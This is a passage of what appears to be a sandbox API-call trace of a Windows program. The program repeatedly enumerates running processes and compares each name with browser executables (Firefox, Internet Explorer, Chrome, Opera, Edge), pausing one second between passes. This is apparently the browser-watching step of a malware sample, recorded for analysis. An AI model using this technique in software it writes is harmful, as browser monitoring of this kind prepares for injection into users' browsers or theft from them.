hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0197.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0197.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0197.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0197.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0197.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0197.587] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0197.587] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0197.587] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0197.587] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0197.588] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0197.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0197.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0197.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0197.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0197.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0197.589] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0197.589] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0197.589] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0197.589] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0197.589] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0197.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0197.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0197.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0197.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0197.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0197.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0197.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0197.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0197.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0197.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.590] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0197.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0197.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0197.591] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0197.591] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0197.591] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0197.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0197.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0197.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0197.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0197.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0197.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0197.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0197.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0197.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0197.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0197.592] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0197.592] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0197.592] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0197.592] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0197.592] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0197.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0197.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0197.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0197.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.593] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.593] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.593] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.594] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.594] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.594] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0197.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0197.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0197.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0197.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0197.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.595] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.595] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.595] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.595] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.595] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0197.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0197.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0197.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0197.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.630] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.630] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.630] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.630] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0197.630] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.630] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.630] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.630] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.630] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0197.630] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.631] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0197.631] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0197.631] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0197.631] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0197.631] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0197.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0197.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0197.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0197.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.632] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.632] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.632] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.632] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0197.632] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.632] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0197.633] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.634] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.634] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.634] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.634] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0197.634] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0197.634] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0197.634] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0197.634] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0197.634] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0197.634] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0197.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.635] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0197.635] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0197.635] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0197.635] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0197.635] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.635] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0197.636] CloseHandle (hObject=0xe8) returned 1 [0197.636] Sleep (dwMilliseconds=0x3e8) [0198.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0198.697] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.697] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0198.697] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0198.697] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0198.697] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0198.697] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0198.697] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.698] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0198.698] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0198.698] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0198.698] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0198.698] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0198.698] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.698] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0198.699] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0198.699] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0198.699] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0198.699] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.699] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.699] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0198.699] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0198.699] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0198.699] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0198.699] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.699] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.700] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0198.700] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0198.700] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0198.700] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0198.700] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.700] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.700] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0198.700] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0198.700] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0198.700] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0198.700] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.700] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.701] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0198.701] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0198.701] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0198.701] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0198.701] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.701] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.701] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0198.702] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0198.702] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0198.702] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0198.702] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.702] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.702] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0198.702] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0198.702] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0198.702] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0198.702] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.702] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0198.703] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0198.703] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0198.703] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0198.703] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0198.703] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.703] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.703] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.703] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.703] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.703] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.703] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.703] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, 